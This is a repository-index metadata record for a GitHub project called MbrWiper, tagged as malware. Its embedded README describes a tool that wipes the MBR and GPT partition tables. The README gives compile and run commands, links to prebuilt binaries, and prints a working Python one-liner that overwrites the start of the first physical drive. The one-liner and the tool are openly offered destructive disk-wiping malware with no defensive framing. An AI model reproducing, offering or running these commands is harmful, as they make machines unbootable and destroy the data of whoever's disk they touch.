{"id":26248035,"url":"https://github.com/mauricelambert/mbrwiper","last_synced_at":"2026-04-15T06:40:26.118Z","repository":{"id":274876617,"uuid":"924072418","full_name":"mauricelambert/MbrWiper","owner":"mauricelambert","description":"This repository implements a little MBR and GPT Wiper.","archived":false,"fork":false,"pushed_at":"2025-04-22T06:21:43.000Z","size":30,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-01-01T00:26:15.855Z","etag":null,"topics":["diskkill","dos","gpt","gptwiper","malware","mbr","mbrwiper"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mauricelambert.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-01-29T11:15:48.000Z","updated_at":"2025-04-22T06:21:46.000Z","dependencies_parsed_at":"2025-04-22T07:25:09.993Z","dependency_job_id":null,"html_url":"https://github.com/mauricelambert/MbrWiper","commit_stats":null,"previous_names":["mauricelambert/mbrwiper"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/mauricelambert/MbrWiper","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FMbrWiper","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FMbrWiper/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FMbrWiper/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FMbrWiper/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mauricelambert","download_url":"https://codeload.github.com/mauricelambert/MbrWiper/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FMbrWiper/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31830157,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-14T18:05:02.291Z","status":"online","status_checked_at":"2026-04-15T02:00:06.175Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["diskkill","dos","gpt","gptwiper","malware","mbr","mbrwiper"],"created_at":"2025-03-13T14:16:44.894Z","updated_at":"2026-04-15T06:40:26.068Z","avatar_url":"https://github.com/mauricelambert.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"![MbrWiper Logo](https://mauricelambert.github.io/info/c/security/MbrWiper_small.png \"MbrWiper logo\")\r\n\r\n# MbrWiper\r\n\r\n## Description\r\n\r\nThis file implements a little MBR and GPT Wiper.\r\n\r\n## Requirements\r\n\r\n - No requirements\r\n\r\n## Download\r\n\r\n[Download binaries (Linux and Windows Libraries and examples) from latest github release](https://github.com/mauricelambert/MbrWiper/releases/latest).\r\n\r\n## Compile\r\n\r\n### Download sources\r\n\r\n```bash\r\ngit clone https://github.com/mauricelambert/MbrWiper.git\r\ncd MbrWiper\r\n```\r\n\r\n#### Windows\r\n\r\n```bash\r\ngcc -Wall -Wextra -Werror -O5 MbrWiper.c -o MbrWiper.exe\r\nstrip MbrWiper\r\n```\r\n\r\n#### Linux\r\n\r\n```bash\r\ngcc -Wall -Wextra -Werror -O5 MbrWiper.c -o MbrWiper\r\nstrip MbrWiper\r\n```\r\n\r\n## Usages\r\n\r\n**Privileges required**\r\n\r\n### Linux\r\n\r\n```bash\r\n./MbrWiper\r\n```\r\n\r\n### Windows\r\n\r\n```bash\r\nMbrWiper.exe\r\n```\r\n\r\n## MBR and GPT Wiper in python oneliner\r\n\r\n```python\r\nopen(\"\\\\\\\\.\\\\PHYSICALDRIVE0\", \"rb+\").write(b\"a\" * 1024)\r\n```\r\n\r\n## Links\r\n\r\n - [Github](https://github.com/mauricelambert/MbrWiper/)\r\n - [Github - compiled executable](https://github.com/mauricelambert/MbrWiper/releases/latest/)\r\n - [SourceForce - compiled executable](https://sourceforge.net/projects/MbrWiper/files/)\r\n\r\n## Licence\r\n\r\nLicensed under the [GPL, version 3](https://www.gnu.org/licenses/).\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmauricelambert%2Fmbrwiper","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmauricelambert%2Fmbrwiper","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmauricelambert%2Fmbrwiper/lists"}